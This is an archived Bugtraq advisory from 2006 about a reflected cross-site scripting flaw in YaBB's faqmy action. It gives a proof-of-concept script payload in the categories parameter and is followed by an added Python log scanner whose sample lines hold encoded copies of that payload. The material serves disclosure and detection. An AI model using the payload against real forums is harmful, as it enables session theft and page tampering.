Bugtraq mailing list archives

Yabb XSS


From: Outlaw () aria-security net
Date: 10 Aug 2006 04:13:34 -0000

###########################################################################################
#Aria-Security.net Advisory                                                               #
#Discovered  by: OUTLAW                                                                   #
#< www.Aria-security.net >                                                                #
#Gr33t to: A.u.r.a  & C0d3r & l2odon & R@1D3N @ DrtRp &                                   #
###########################################################################################
#Software: YaBB                                                                                    
#Attack method: Cross Site Scripting                                                      
#                                                                                         
#                                                                                         
#Proof of Concept:                                                                        
#                                                                                         
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss")</script>       
#                                                                                         
#----------------------------------------------------------                               
#                                                                                         
#Solution                                                                                 
#                                                                                         
#No Solutions                                                                             
#                                                                                         
#Contact : Outlaw () aria-security net                                                       
#                                                                                         
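An added detection example, not part of the original advisory: it scans web server access logs for requests to the advisory's `action=faqmy` URL whose `categories` parameter decodes to HTML markup characters. The combined log format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Characters that let a reflected value break out of HTML text or attributes.
MARKUP = re.compile(r"[<>\"'`]")
# Request line of a combined-format access log (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2006:04:20:01 +0000] "GET /index.php?action=faqmy&myfaq=yes&id_cat=1&categories=general HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Aug/2006:04:21:13 +0000] "GET /index.php?action=faqmy&myfaq=yes&id_cat=1&categories=%3Cscript%3Ealert(%22xss%22)%3C/script%3E HTTP/1.1" 200 5177',
    '192.0.2.44 - - [10/Aug/2006:04:21:40 +0000] "GET /index.php?action=faqmy&myfaq=yes&id_cat=1&categories=%253Cb%253E HTTP/1.1" 200 5130',
    '192.0.2.71 - - [10/Aug/2006:04:22:05 +0000] "GET /index.php?action=display&categories=%3Cb%3E HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), bounded to `rounds`."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_faqmy(line):
    """Return the decoded `categories` value when the log line is a faqmy
    request carrying markup characters in that parameter, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    # parse_qs performs the first percent-decoding pass.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "faqmy" not in params.get("action", []):
        return None
    for raw in params.get("categories", []):
        # Nested encoding is flagged conservatively, in case a proxy or
        # the application decodes the value a second time.
        value = fully_decode(raw)
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    checked = ((n, suspicious_faqmy(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in checked if v is not None]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: categories={value!r}")
```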


